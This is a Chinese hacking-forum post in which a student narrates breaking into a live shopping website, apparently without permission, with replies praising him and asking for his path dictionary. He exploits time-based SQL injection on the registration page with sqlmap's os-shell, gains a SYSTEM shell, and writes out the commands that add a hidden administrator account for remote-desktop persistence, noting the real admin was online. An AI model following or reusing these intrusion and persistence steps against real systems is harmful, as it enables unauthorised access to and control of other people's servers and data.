用户
搜索

该用户从未签到

i春秋-呆萌菜鸟

Rank: 1

1

主题

2

帖子

25

魔法币
收听
0
粉丝
0
注册时间
2019-6-22
发表于 2020-4-29 17:35:07 83495
之前在批量搜集资产的时候,遇到了一个网站。看到了底部版权信息
ss.jpg
毕业设计??嘿嘿嘿,身为大一学生的我,自然要向学长们请教请教。
网站结构大致是这样的
1.jpg
很普通的一个购物网站
先看功能点,
搜索    route:   /search.php?search=ss
登录    注册   route: /register.php
在搜索框里测试了一下SQL注入,发现字符被实体转换。果断放弃

来到登录,注册页。


是.jpg
看了下样式,估摸着应该是网上随便copy来的模板。登录测试一下SQL
s1.jpg

字符和数字都返回对应227字节。 结论:无注入。
来到注册。

s2.jpg

注册成功返回191字节

s3.jpg
添加单引号返回207字节
疑似存在注入,直接Copy数据包丢SQLmap
最后测试为延时注入。(最头疼的方法,要跑好久)

分析了一下网站结构。win+apche+mysql+php
典型的phpstudy。
sqlmap直接os-shell走一遍。
使用phpstudy路径字典遍历测试。
最终路径为:C:\\phpstudy\\www

得到一个shell
s5.jpg
whoami查看权限。为system。提权?提jb
因为服务器是腾讯云的,默认开放3389端口,直接net一个用户连上去
net user yilin$ yilin123.. /add

net localgroup administrators yilin$ /add
s6.jpg
发现管理员居然还在线。。
查看文件目录

后台为admin.php   /admin /admin888..
后台功能很单一。没有上传点,但是注入基本一打一个准。。

s7.jpg





s4.jpg
强啊老哥6666666
使用道具 举报 回复
J0o1ey 超级版主 培训/业务联系Q547006660 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手
板凳
发表于 2020-4-30 10:00:10
感谢分享,phpstudy路径字典可否分享一下
有培训需求或是技术交流需求的朋友可以联系我~QQ547006660|交流群820783253|团队首页www.gcowsec.com|
使用道具 举报 回复
发表于 2020-4-30 15:10:45
使用道具 举报 回复
发表于 2020-5-2 01:32:49
学到学到,表哥字典看能不能分享到手哈哈哈
正值少年风华月貌
使用道具 举报 回复
发表于 2020-5-4 21:58:47
表哥,你露点了,打吗这方面我就不服你
有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
使用道具 举报 回复
学到了!@
使用道具 举报 回复
666666666666现在大一都这么厉害了
使用道具 举报 回复
同求一份目录字典。。。
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册